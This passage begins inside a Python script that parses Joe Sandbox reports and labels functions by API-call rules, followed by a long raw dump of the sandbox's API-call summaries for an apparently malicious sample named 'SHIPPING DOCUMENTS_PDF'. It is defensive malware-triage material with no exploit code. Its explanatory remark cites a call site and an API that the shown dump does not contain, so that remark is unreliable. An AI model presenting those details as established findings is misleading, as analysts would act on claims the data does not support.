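# The greedy ".*" for args tolerates nested parentheses such as "00000003(TokenIntegrityLevel)".
CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9_]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•?\s*(?P<key>API ID|Opcode ID|Source File):\s*(?P<val>.*?)\s*$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: str
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee address when reported as "Part of subcall function"

@dataclass
class FunctionSummary:
    calls: list = field(default_factory=list)
    api_id: str = ""
    opcode_id: str = ""
    source: str = ""

    def direct_apis(self):
        return {c.api for c in self.calls if c.subcall_of is None}

    def all_apis(self):
        return {c.api for c in self.calls}

def parse_report(text):
    """Split the report text at each 'APIs' header; one FunctionSummary per block."""
    funcs, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionSummary()
            funcs.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            cur.calls.append(ApiCall(m["api"], m["mod"], m["args"] or "", int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
            continue
        m = FIELD_RE.match(line)
        if m:
            attr = {"API ID": "api_id", "Opcode ID": "opcode_id", "Source File": "source"}[m["key"]]
            setattr(cur, attr, m["val"])
    return funcs

# Assumed behaviour rules (this example's own, not Joe Sandbox signatures): a label applies
# when every listed API appears in the function, counting calls reached through subcalls.
BEHAVIOURS = {
    "process enumeration (Toolhelp32 walk)": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "token integrity / privilege check": {"GetTokenInformation", "LookupPrivilegeValueW"},
    "WinINet HTTP client": {"InternetConnectW", "InternetOpenUrlW"},
    "hostname resolution": {"gethostbyname", "inet_ntoa"},
}

def classify(func):
    return sorted(label for label, need in BEHAVIOURS.items() if need <= func.all_apis())

def triage(text):
    """(Opcode ID prefix, lowest call-site address, labels) for every function that matched a rule."""
    out = []
    for f in parse_report(text):
        labels = classify(f)
        if labels:
            out.append((f.opcode_id[:8], min(c.ref for c in f.calls), labels))
    return out

if __name__ == "__main__":
    for opcode, addr, labels in triage(SAMPLE):
        print(f"{opcode}  first call @ {addr:08X}  {', '.join(labels)}")
```

The split between direct_apis and all_apis matters when reading these summaries: a rule that needs GetTokenInformation only fires for the second function because the call is reported inside the subcall at 00BA810A, so matching on direct calls alone would miss it. Extend BEHAVIOURS with the API sets that matter for your own triage; the Opcode ID prefix is kept in the output so each hit can be traced back to its block in the report.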
                                                                                    APIs
                                                                                    • __setmode.LIBCMT ref: 00B709AE
                                                                                      • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
                                                                                      • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
                                                                                    • _fprintf.LIBCMT ref: 00B709E5
                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00BA5DBB
                                                                                      • Part of subcall function 00B74AAA: _flsall.LIBCMT ref: 00B74AC3
                                                                                    • __setmode.LIBCMT ref: 00B70A1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                    • String ID:
                                                                                    • API String ID: 521402451-0
                                                                                    • Opcode ID: dca3761379a59fa681fd2bf15eb75528e9220bc286c4905bb3343daa7f865082
                                                                                    • Instruction ID: d5466c657344e2b6bcc742b1407544c368ca661b81b24687dd849c669a6f48d5
                                                                                    • Opcode Fuzzy Hash: dca3761379a59fa681fd2bf15eb75528e9220bc286c4905bb3343daa7f865082
                                                                                    • Instruction Fuzzy Hash: EB113A31908608BFDB04B7B49C86AFE77E8DF42322F2481E6F52957192EF705D4687A1
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BC17A3
                                                                                      • Part of subcall function 00BC182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BC184C
                                                                                      • Part of subcall function 00BC182D: InternetCloseHandle.WININET(00000000), ref: 00BC18E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1463438336-0
                                                                                    • Opcode ID: a5603b7b2e016a81f07e2f16b6e9678bb91c32f6b58a5670da90aa10ae08702a
                                                                                    • Instruction ID: fb625cca2fc04c7cb31271128541144cf6e72ff9b7e8103ce747f40803c95701
                                                                                    • Opcode Fuzzy Hash: a5603b7b2e016a81f07e2f16b6e9678bb91c32f6b58a5670da90aa10ae08702a
                                                                                    • Instruction Fuzzy Hash: FD212371208601BFEB128F64CC40FBABBE9FF4A701F10442EFA01A7652DB31D810A7A0
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(?,00BDFAC0), ref: 00BB3A64
                                                                                    • GetLastError.KERNEL32 ref: 00BB3A73
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BB3A82
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00BDFAC0), ref: 00BB3ADF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 2267087916-0
                                                                                    • Opcode ID: 6baf07779ff962a637cb8a2598c3ce8cbd76cf406ee9d4118d763f2c4270bd21
                                                                                    • Instruction ID: b0674166f028431dc7099248bb3d81a7e60a11efe3d5398fd25da0e80cc2ef74
                                                                                    • Opcode Fuzzy Hash: 6baf07779ff962a637cb8a2598c3ce8cbd76cf406ee9d4118d763f2c4270bd21
                                                                                    • Instruction Fuzzy Hash: 9B21D8745082019F8310DF24D8918BEB7E4EF55764F244AAEF4D9C72A1EB71DE09CB42
                                                                                    APIs
                                                                                      • Part of subcall function 00BAF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?), ref: 00BAF0CB
                                                                                      • Part of subcall function 00BAF0BC: lstrcpyW.KERNEL32(00000000,?,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BAF0F1
                                                                                      • Part of subcall function 00BAF0BC: lstrcmpiW.KERNEL32(00000000,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?), ref: 00BAF122
                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADCEC
                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADD12
                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADD46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                    • String ID: cdecl
                                                                                    • API String ID: 4031866154-3896280584
                                                                                    • Opcode ID: 46d7110aa158e209aa1125e1d5278c445d818058aa5a57e2194c3fa89fb56c4f
                                                                                    • Instruction ID: ee9fdd17f1f90df0d15e94ef4235979443c608137007e54e5d80360c7df0ae29
                                                                                    • Opcode Fuzzy Hash: 46d7110aa158e209aa1125e1d5278c445d818058aa5a57e2194c3fa89fb56c4f
                                                                                    • Instruction Fuzzy Hash: C011D03A204306EFCB25AF74C845DBA77E9FF46350B4080BAF856CB2A0EB719941C790
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00B85101
                                                                                      • Part of subcall function 00B7571C: __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                                                      • Part of subcall function 00B7571C: __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                                                      • Part of subcall function 00B7571C: RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,00000000,?,?,?,00B70DD3,?), ref: 00B7575F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 614378929-0
                                                                                    • Opcode ID: cd6a233b4a4c5273d03941683bbddc3e4c62980de129f9397eec84f2b033718d
                                                                                    • Instruction ID: cad78512df26f50d9c17c8967276d05957e7182fc2c7d309c93c47644335fd87
                                                                                    • Opcode Fuzzy Hash: cd6a233b4a4c5273d03941683bbddc3e4c62980de129f9397eec84f2b033718d
                                                                                    • Instruction Fuzzy Hash: 9D11E372905A12AECB313F70EC4D76D37D8EB00361B1085AAF919AA260DF31C940D794
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00B544CF
                                                                                      • Part of subcall function 00B5407C: _memset.LIBCMT ref: 00B540FC
                                                                                      • Part of subcall function 00B5407C: _wcscpy.LIBCMT ref: 00B54150
                                                                                      • Part of subcall function 00B5407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B54160
                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00B54524
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B54533
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B8D4B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1378193009-0
                                                                                    • Opcode ID: 98e9529d2a7efed903f105bc4c826c80fdb97a4a40fdc8e8ac6c2e8cb8dd261c
                                                                                    • Instruction ID: 97f5a9dc25798cc3a40629b7449d7e4da601bf7907d6368109a1aea3dd41290a
                                                                                    • Opcode Fuzzy Hash: 98e9529d2a7efed903f105bc4c826c80fdb97a4a40fdc8e8ac6c2e8cb8dd261c
                                                                                    • Instruction Fuzzy Hash: 03210770908784AFE7329B249895BE6BBECEF11319F0800DEE69E57291D7746988CB41
APIs
  • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
  • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
• gethostbyname.WSOCK32(?), ref: 00BC6399
• WSAGetLastError.WSOCK32(00000000), ref: 00BC63A4
• _memmove.LIBCMT ref: 00BC63D1
• inet_ntoa.WSOCK32(?), ref: 00BC63DC
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00BA8B61
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8B73
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8B89
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8BA4
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
  • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
• DefDlgProcW.USER32(?,00000020,?), ref: 00B512D8
• GetClientRect.USER32(?,?), ref: 00B8B5FB
• GetCursorPos.USER32(?), ref: 00B8B605
• ScreenToClient.USER32(?,?), ref: 00B8B610
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB1184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB11C1
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00BAD84D
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00BAD864
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00BAD879
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00BAD897
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
APIs
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
APIs
• GetWindowRect.USER32(?,?), ref: 00BDB2E4
• ScreenToClient.USER32(?,?), ref: 00BDB2FC
• ScreenToClient.USER32(?,?), ref: 00BDB320
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BDB33B
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
APIs
• _memset.LIBCMT ref: 00BDB644
• _memset.LIBCMT ref: 00BDB653
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C16F20,00C16F64), ref: 00BDB682
• CloseHandle.KERNEL32 ref: 00BDB694
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID:
• API String ID: 3277943733-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00BB6BE6
  • Part of subcall function 00BB76C4: _memset.LIBCMT ref: 00BB76F9
• _memmove.LIBCMT ref: 00BB6C09
• _memset.LIBCMT ref: 00BB6C16
• LeaveCriticalSection.KERNEL32(?), ref: 00BB6C26
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• API String ID: 48991266-0
APIs
• GetSysColor.USER32(00000008), ref: 00B52231
• SetTextColor.GDI32(?,000000FF), ref: 00B5223B
• SetBkMode.GDI32(?,00000001), ref: 00B52250
• GetStockObject.GDI32(00000005), ref: 00B52258
• GetWindowDC.USER32(?,00000000), ref: 00B8BE83
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00B8BE90
• GetPixel.GDI32(00000000,?,00000000), ref: 00B8BEA9
• GetPixel.GDI32(00000000,00000000,?), ref: 00B8BEC2
• GetPixel.GDI32(00000000,?,?), ref: 00B8BEE2
• ReleaseDC.USER32(?,00000000), ref: 00B8BEED
                                                                                    Similarity
                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1946975507-0
                                                                                    • Opcode ID: e26c204da0ddaa659df6d943303abfe45cdfe3ea83c32d6691b16b314793af4c
                                                                                    • Instruction ID: 7da435155b0d254b053f0a4daccae55eb9145244d1f716a18ad64891270bd946
                                                                                    • Opcode Fuzzy Hash: e26c204da0ddaa659df6d943303abfe45cdfe3ea83c32d6691b16b314793af4c
                                                                                    • Instruction Fuzzy Hash: 0DE03932109245AADF215FA4FC0DBE87B50EB15336F0483A7FA6A580F19B728980DB12
                                                                                    APIs
                                                                                    • GetCurrentThread.KERNEL32 ref: 00BA871B
                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00BA82E6), ref: 00BA8722
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00BA82E6), ref: 00BA872F
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00BA82E6), ref: 00BA8736
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                    • String ID:
                                                                                    • API String ID: 3974789173-0
                                                                                    • Opcode ID: d9c06e316a894be712f710db8bdea588c01021c96e492f230b8791f45da3ea69
                                                                                    • Instruction ID: 3b6046166361b8c0491f4ee9ed911b1b930273916512fdb888be166b631da968
                                                                                    • Opcode Fuzzy Hash: d9c06e316a894be712f710db8bdea588c01021c96e492f230b8791f45da3ea69
                                                                                    • Instruction Fuzzy Hash: BAE0863661A2129BD7205FF05D0CB66BBECEF51791F158869B246CB040FE348841C750
                                                                                    APIs
                                                                                    • __getptd_noexit.LIBCMT ref: 00B75DAD
                                                                                      • Part of subcall function 00B799C4: GetLastError.KERNEL32(00000000,00B70DD3,00B78B2D,00B757A3,?,?,00B70DD3,?), ref: 00B799C6
                                                                                      • Part of subcall function 00B799C4: __calloc_crt.LIBCMT ref: 00B799E7
                                                                                      • Part of subcall function 00B799C4: __initptd.LIBCMT ref: 00B79A09
                                                                                      • Part of subcall function 00B799C4: GetCurrentThreadId.KERNEL32 ref: 00B79A10
                                                                                      • Part of subcall function 00B799C4: SetLastError.KERNEL32(00000000,00B70DD3,?), ref: 00B79A28
                                                                                    • CloseHandle.KERNEL32(?,?,00B75D8C), ref: 00B75DC1
                                                                                    • __freeptd.LIBCMT ref: 00B75DC8
                                                                                    • ExitThread.KERNEL32 ref: 00B75DD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                    • String ID:
                                                                                    • API String ID: 4169687693-0
                                                                                    • Opcode ID: fa626a095e48580fd264d5af3b4b600e326c3a4d16f81f2b305444f873e425c6
                                                                                    • Instruction ID: a1e569bfe738daf290f826195981e18bb1e94420de2e97f0f7af6f2d7b5c3ab6
                                                                                    • Opcode Fuzzy Hash: fa626a095e48580fd264d5af3b4b600e326c3a4d16f81f2b305444f873e425c6
                                                                                    • Instruction Fuzzy Hash: 24D0A731002F114BD63227348C0DA3977D0DF01731B05C26DF17E461F09F6058028645
                                                                                    APIs
                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00BAB4BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContainedObject
                                                                                    • String ID: AutoIt3GUI$Container
                                                                                    • API String ID: 3565006973-3941886329
                                                                                    • Opcode ID: df226e57cea04ed5822b0159eb267f3d8ec224ae25b53e90c35901407f06adc8
                                                                                    • Instruction ID: b2dafc0de4b592ba236d81e6bc5c7682f9f7202ed8eb534811dbb1c8f7265abd
                                                                                    • Opcode Fuzzy Hash: df226e57cea04ed5822b0159eb267f3d8ec224ae25b53e90c35901407f06adc8
                                                                                    • Instruction Fuzzy Hash: A2915970604601AFDB14DF64C894E6AB7F9FF49700F2485AEE95ACB3A2DB71E841CB50
                                                                                    APIs
                                                                                      • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • __wcsnicmp.LIBCMT ref: 00BBB02D
                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00BBB0F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                    • String ID: LPT
                                                                                    • API String ID: 3222508074-1350329615
                                                                                    • Opcode ID: d4061873e44dd037d534404ab9aa81b3c887c50b5ad3fa7749405fc618587e54
                                                                                    • Instruction ID: 5ddd50e1576a1d45483681608d5f04f161dec2ca3adae5a4e68338c1adc44c03
                                                                                    • Opcode Fuzzy Hash: d4061873e44dd037d534404ab9aa81b3c887c50b5ad3fa7749405fc618587e54
                                                                                    • Instruction Fuzzy Hash: 03613C75A10219AFCB14EF98C891EFEB7F4EB09710F1440A9F956AB291D7B0AE44CB50
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000), ref: 00B62968
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00B62981
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
